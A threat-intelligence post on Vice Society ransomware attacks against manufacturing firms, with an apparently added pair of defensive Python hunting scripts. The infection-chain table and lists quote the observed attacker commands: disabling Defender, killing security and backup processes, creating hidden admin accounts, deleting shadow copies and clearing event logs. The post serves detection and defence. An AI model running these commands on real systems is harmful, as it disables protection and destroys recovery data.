Trend Micro Inc.

01/24/2023 | News release | Distributed by Public on 01/24/2023 02:44

Vice Society Ransomware Group Targets Manufacturing Companies

The Vice Society ransomware group made headlines in late 2022 and early 2023 during a spate of attacks against several targets, such as the one that affected the rapid transit system in San Francisco. Most reports have the threat actor focusing its efforts on the education and healthcare industries. However, Trend Micro's telemetry data gives us evidence that the group is also targeting the manufacturing sector, which means that it has the capability and desire to penetrate different industries, most likely accomplished by purchasing compromised credentials from underground channels. We have detected the presence of Vice Society in Brazil (primarily affecting the country's manufacturing industry), Argentina, Switzerland, and Israel.

Vice Society, which was initially reported to be exploiting the PrintNightmare vulnerability in its routines, has previously deployed ransomware variants such as Hello Kitty/Five Hands and Zeppelin (the group's email address has appeared in those ransom notes). More recently, Vice Society has developed its own custom ransomware builder and adopted more robust encryption methods. This, and any further enhancements, could mean that the group is preparing its own ransomware-as-a-service (RaaS) operation.

In this blog entry, we highlight our findings on Vice Society, which include an end-to-end infection diagram that we were able to create using Trend Micro internal telemetry. Our detection name for this variant of Vice Society's ransomware is Ransom.Win64.VICESOCIETY.A.

Figure 1. Vice Society's evolution throughout 2021 to late 2022
Figure 2. Trend Micro Smart Protection Network (SPN) detections for Vice Society from November 2022 to January 2023 (unique endpoints)
Figure 3. Distribution of affected industries based on the Vice Society leak site

Technical analysis and infection flow

Based on our internal telemetry, we were able to create an infection diagram for a Vice Society ransomware attack (illustrated in Figure 4). The arrival vector likely involves the exploitation of a public-facing website or the abuse of compromised remote desktop protocol (RDP) credentials.

Figure 4. The infection chain of a Vice Society attack

The following table shows what we were able to observe from a Vice Society attack. Note that all endpoints indicated belong to a single GUID (one affected organization).

October 28, 2022: Possible entry point using Cobalt Strike and the Rubeus hacktool
    Cobalt Strike connects to 57thandnormal[.]com

November 12, 2022: Deployed Zeppelin ransomware
    Path: C:\mnt\smile.exe

November 12, 2022: Copied files
    kape.exe --tsource C --target RecycleBin --tdest output --zip RecycleBin_{ComputerName}

November 12, 2022: Deployed Mimikatz
    Path: C:\ProgramData\toolkiit\{redacted}\output\C\$Recycle.Bin\{redacted}\$RY0DNVE.exe

November 12, 2022: Executed a PowerShell script (w1.ps1)
    Command: /c powershell.exe -ExecutionPolicy Bypass -file \\{ComputerName}\s$\w1.ps1

November 12, 2022: Disabled antivirus (AV) programs such as Trend Micro Apex One and Windows Defender
    /i \\{ComputerName}\netlogon\ApexOneCloud\agent_cloud_x64.msi /quiet
    add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f

November 12, 2022: Deployed Vice Society ransomware
    Path: C:\ProgramData\test.exe

November 12, 2022: Created an Administrator account on each endpoint and added it to the Administrators and Remote Desktop Users local groups
    user Administrator {password} /add
    localgroup Administrators Administrator /ADD
    localgroup "Remote Desktop Users" Administrator /ADD
    add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v Administrator /t REG_DWORD /d 0 /f

November 12, 2022: Terminated processes such as AV and security software
    process where "name like '%Agent%'" delete
    process where "name like '%Malware%'" delete
    process where "name like '%Endpoint%'" delete
    process where "name like '%sql%'" delete
    process where "name like '%Veeam%'" delete
    process where "name like '%Core.Service%'" delete

November 12, 2022: Exfiltrated important files

November 12, 2022: Multiple copies of the Vice Society ransomware were dropped in the %Temp% directory on different endpoints
    Path: C:\windows\temp\svchost.exe

November 12, 2022: Observed the Neshta file infector

November 12, 2022: Performed the ransomware routine via $mytemp$\svchost.exe
    /c vssadmin.exe Delete Shadows /All /Quiet

November 12, 2022: Vice Society ransomware routine performed (files are encrypted, a ransom note with email contacts is dropped, and the extension .v1cesO0ciety is appended to encrypted files)
    Ransom note: AllYFilesAE!
    Extension: .v1cesO0ciety
    Contact emails of the ransom operators:
        876505846904@onionmail[.]org
        316186524106@onionmail[.]org
        v-society.official@onionmail[.]org

November 12, 2022: Event Viewer logs and remote session traces such as RDP and terminal services were cleared
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
    cd %userprofile%\documents\
    attrib Default.rdp -s -h
    del Default.rdp
    for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

November 12, 2022: Deleted itself from the system
    "%System%\cmd.exe" /c del {Malware File Path}\{Malware File Name} > nul

Table 1. Date and description of the routines involved in a Vice Society attack
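Most of the rows in Table 1 leave a command line behind, which makes them straightforward to hunt for in process-creation telemetry. The script below is an added example written for this entry; it is not Trend Micro code and not part of the original post. It assumes you can export process-creation events (for example Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled) as records carrying a host name, an ISO timestamp and the full command line. The records in SAMPLE_EVENTS, including the host names and the password, are constructed placeholders; the rule names and the 24-hour correlation window are the author's choices, not anything from the report.

```python
"""Hunt for the Table 1 command-line patterns in process-creation telemetry.

Added example for this write-up; not Trend Micro code. Each rule mirrors one
observed command from Table 1. The patterns are deliberately narrow (they match
the observed syntax, not every possible variant), so tune them before relying
on them in production.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (technique label, regex over the full command line). Labels are the author's.
RULES = [
    ("powershell-bypass-from-admin-share",
     re.compile(r"powershell(?:\.exe)?\s.*-ExecutionPolicy\s+Bypass\s+-file\s+\\\\[^\\\s]+\\[^\\\s]+\$\\", re.I)),
    ("defender-policy-tamper",
     re.compile(r"Windows Defender(?:\\MpEngine)?\"?\s+/v\s+(?:DisableAntiVirus|DisableAntiSpyware|MpEnablePus)\b", re.I)),
    ("wmic-kill-by-name-pattern",
     re.compile(r"process\s+where\s+\"?name\s+like\s+'%[^']*%'\"?\s+delete", re.I)),
    ("local-account-create",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("local-admin-or-rdp-group-add",
     re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+(?:\"Remote Desktop Users\"|Administrators)\s+\S+\s+/add\b", re.I)),
    ("hide-account-from-logon",
     re.compile(r"SpecialAccounts\\Userlist\"?\s+/v\s+\S+\s+/t\s+REG_DWORD\s+/d\s+0\b", re.I)),
    ("shadow-copy-delete",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("event-log-clear",            # 'wevtutil el' alone is benign enumeration
     re.compile(r"wevtutil(?:\.exe)?\s+cl\b", re.I)),
    ("rdp-trace-removal",
     re.compile(r"(?:reg\s+delete\s+\"*HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client|\bdel\s+Default\.rdp\b)", re.I)),
    ("kape-collection",
     re.compile(r"\bkape(?:\.exe)?\s+--tsource\b", re.I)),
]

# Constructed sample telemetry (host names and password are placeholders).
SAMPLE_EVENTS = [
    {"host": "WS-FIN-07", "ts": "2022-11-12T10:02:11",
     "cmd": r"cmd.exe /c powershell.exe -ExecutionPolicy Bypass -file \\DC01\s$\w1.ps1"},
    {"host": "WS-FIN-07", "ts": "2022-11-12T10:02:15",
     "cmd": r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f'},
    {"host": "WS-FIN-07", "ts": "2022-11-12T10:02:16",
     "cmd": "wmic process where \"name like '%Veeam%'\" delete"},
    {"host": "WS-FIN-07", "ts": "2022-11-12T10:03:40",
     "cmd": "cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet"},
    {"host": "WS-FIN-07", "ts": "2022-11-12T10:05:02",
     "cmd": "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\""},
    {"host": "WS-HR-02", "ts": "2022-11-12T09:00:00",
     "cmd": "net user Administrator PLACEHOLDER-PW /add"},
    {"host": "WS-HR-02", "ts": "2022-11-12T09:00:01",
     "cmd": "net localgroup Administrators Administrator /ADD"},
    {"host": "SRV-FILE-01", "ts": "2022-11-12T08:30:00",
     "cmd": "wevtutil.exe el"},                                   # benign
    {"host": "SRV-FILE-01", "ts": "2022-11-12T08:31:00",
     "cmd": r'reg query "HKLM\Software\Policies\Microsoft\Windows Defender"'},  # benign read
]


def classify(cmd):
    """Return the set of technique labels whose rule matches this command line."""
    return {label for label, rx in RULES if rx.search(cmd)}


def flag_hosts(events, threshold=3, window=timedelta(hours=24)):
    """Flag hosts on which at least `threshold` distinct techniques occur within `window`.

    One hit alone (say, an admin legitimately clearing a log) is weak evidence;
    several of the Table 1 behaviours on one host in one day is the chain.
    """
    by_host = defaultdict(list)
    for ev in events:
        techs = classify(ev["cmd"])
        if techs:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), techs))
    flagged = {}
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _) in enumerate(hits):
            seen = set()
            for ts, techs in hits[i:]:
                if ts - start > window:
                    break
                seen |= techs
            if len(seen) >= threshold:
                flagged[host] = {"first_seen": start.isoformat(), "techniques": sorted(seen)}
                break
    return flagged


if __name__ == "__main__":
    for host, info in flag_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: {len(info['techniques'])} techniques since {info['first_seen']}")
        for t in info["techniques"]:
            print(f"  - {t}")
```

Run against the constructed sample, only WS-FIN-07 is flagged (five distinct techniques inside the window); WS-HR-02 shows the account-creation pair but stays below the threshold, and the benign `wevtutil.exe el` and `reg query` on SRV-FILE-01 match nothing. Lowering the threshold to 2 surfaces WS-HR-02 as well, which is the usual trade-off between noise and early warning.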

The weaponized tool used by Vice Society is Cobalt Strike, which allows the group to remotely access and control the infected endpoint. The threat actor also used the Rubeus C# toolset for raw Kerberos interaction and abuse (although this is not a new technique, since it has been previously used by Ryuk, Conti, and BlackCat).

To move laterally within the target network, Mimikatz was used to dump passwords and the Kape tool to copy files. We also observed the presence of the Zeppelin ransomware on another endpoint, which also used Kape for data exfiltration. Vice Society was known to have deployed Zeppelin before; however, perhaps due to its weaker encryption, the threat actor decided to go with custom-built ransomware.

Vice Society then executes a PowerShell script to create an administrator account that allows remote access to other endpoints, and to terminate several processes, such as running security software, before dropping the custom-built ransomware. In most of the Vice Society detections we also observed the presence of the Neshta file infector (which can be cleaned by Trend Micro), although it is not clear how this occurred.

Virtual servers, such as Microsoft Hyper-V, are also affected in this attack. We also found the attacker removing traces of RDP sessions and clearing event logs with wevtutil.exe, a technique that was previously used by Clop ransomware and KillDisk.

Figure 5. The ransomware note (top) and desktop ransom message (bottom) displayed on the victim's machine
Figure 6. The primary TOR website and mirror links
Figure 7. Vice Society's file storage site

Once the administrator account has been added, Vice Society terminates several processes, including security-related ones, so that its ransomware can be deployed and executed successfully on the affected endpoints. The process-name patterns it matches (the `name like '...'` expressions shown in Table 1) are listed below.

  • %Agent%
  • %Malware%
  • %Endpoint%
  • %sql%
  • %Veeam%
  • %Core.Service%
  • %Mongo%
  • %Backup%
  • %QuickBooks%
  • %QBDB%
  • %QBData%
  • %QBCF%
  • %Kaspersky%
  • %server%
  • %sage%
  • %http%
  • %apache%
  • %segurda%
  • %center%
  • %silverlight%
  • %exchange%
  • %manage%
  • %acronis%
  • %autodesk%
  • %database%
  • %firefox%
  • %chrome%
  • %barracuda%
  • %arcserve%
  • %sprout%
  • %anydesk%
  • %protect%
  • %secure%
  • %adobe%
  • %java%
  • %logmein%
  • %microsoft%
  • %solarwinds%
  • %engine%
  • %web%
  • %vnc%
  • %teamviewer%
  • %OCSInventory%
  • %monitor%
  • %security%
  • %def%
  • %dev%
  • %office%
  • %Framework%
  • %AlwaysOn%
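The patterns above are WQL LIKE expressions, so `%` matches any run of characters and the comparison is case-insensitive, which makes entries such as `%dev%`, `%web%` or `%server%` far broader than their apparent target. The script below is an added example for this entry, not code from the post or from Trend Micro: it translates each pattern into an anchored regex and reports which processes from an inventory would be selected. SAMPLE_PROCESSES is a constructed inventory; replacing it with the output of `tasklist` on a representative build shows what the list would actually take down in your environment.

```python
"""Blast-radius check for the Vice Society process-termination list.

Added example; not from the post or from Trend Micro. WQL LIKE semantics
assumed here: '%' = any run of characters, '_' = one character, matching is
case-insensitive. Bracket character classes never occur in this list, so they
are not handled.
"""
import re

# The 50 patterns listed in the post, in the order given.
KILL_PATTERNS = [
    "%Agent%", "%Malware%", "%Endpoint%", "%sql%", "%Veeam%", "%Core.Service%",
    "%Mongo%", "%Backup%", "%QuickBooks%", "%QBDB%", "%QBData%", "%QBCF%",
    "%Kaspersky%", "%server%", "%sage%", "%http%", "%apache%", "%segurda%",
    "%center%", "%silverlight%", "%exchange%", "%manage%", "%acronis%",
    "%autodesk%", "%database%", "%firefox%", "%chrome%", "%barracuda%",
    "%arcserve%", "%sprout%", "%anydesk%", "%protect%", "%secure%", "%adobe%",
    "%java%", "%logmein%", "%microsoft%", "%solarwinds%", "%engine%", "%web%",
    "%vnc%", "%teamviewer%", "%OCSInventory%", "%monitor%", "%security%",
    "%def%", "%dev%", "%office%", "%Framework%", "%AlwaysOn%",
]

# Constructed inventory of process names as Win32_Process reports them.
SAMPLE_PROCESSES = [
    "MsMpEng.exe", "svchost.exe", "lsass.exe", "explorer.exe",
    "sqlservr.exe", "Veeam.Backup.Service.exe", "chrome.exe", "firefox.exe",
    "TeamViewer_Service.exe", "devenv.exe", "httpd.exe", "javaw.exe",
    "OfficeClickToRun.exe", "SecurityHealthService.exe", "AnyDesk.exe",
]


def wql_like_to_regex(pattern):
    """Translate a WQL LIKE pattern into a case-insensitive regex for fullmatch()."""
    parts = []
    for ch in pattern:
        if ch == "%":
            parts.append(".*")
        elif ch == "_":
            parts.append(".")
        else:
            parts.append(re.escape(ch))   # keeps the dot in %Core.Service% literal
    return re.compile("".join(parts), re.IGNORECASE)


def matching_patterns(process_name, patterns=KILL_PATTERNS):
    """Return the patterns (in list order) that would select this process name."""
    return [p for p in patterns if wql_like_to_regex(p).fullmatch(process_name)]


def blast_radius(process_names, patterns=KILL_PATTERNS):
    """Map every process that would be terminated to the patterns that hit it."""
    result = {}
    for name in process_names:
        hits = matching_patterns(name, patterns)
        if hits:
            result[name] = hits
    return result


if __name__ == "__main__":
    radius = blast_radius(SAMPLE_PROCESSES)
    for name in SAMPLE_PROCESSES:
        verdict = "terminated by " + ", ".join(radius[name]) if name in radius else "survives"
        print(f"{name:28s} {verdict}")
```

On the constructed inventory, 11 of the 15 processes are selected, including backup, database, browser and remote-support processes, while core Windows processes such as svchost.exe and lsass.exe are untouched. The Defender engine process in the sample, MsMpEng.exe, matches none of the name patterns either, which is consistent with the separate registry-based Defender tampering in Table 1 rather than a name-based kill.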

Conclusion and Trend Micro solutions

Vice Society seems to be constantly improving its capabilities, having built its own custom ransomware while continuing to employ toolsets such as Cobalt Strike and malware such as Zeppelin and Hello Kitty/Five Hands to enhance its routines. Furthermore, the use of the Kape tool can speed up the identification of important files on a computer. Given what we know of the group's technical knowledge and its willingness to target several different industries and regions, we can expect it to remain a significant player in the ransomware landscape and a threat that organizations must keep track of moving forward.

A multilayered approach can help organizations guard possible entry points into their systems, such as endpoints, email, web, and networks. The following security solutions can detect malicious components and suspicious behavior, which helps protect enterprises.

  • Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools early on before the ransomware can do irreversible damage to the system.
  • Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning.
  • Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.
  • Trend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.

Indicators of Compromise

The indicators of compromise for this blog entry can be found here.
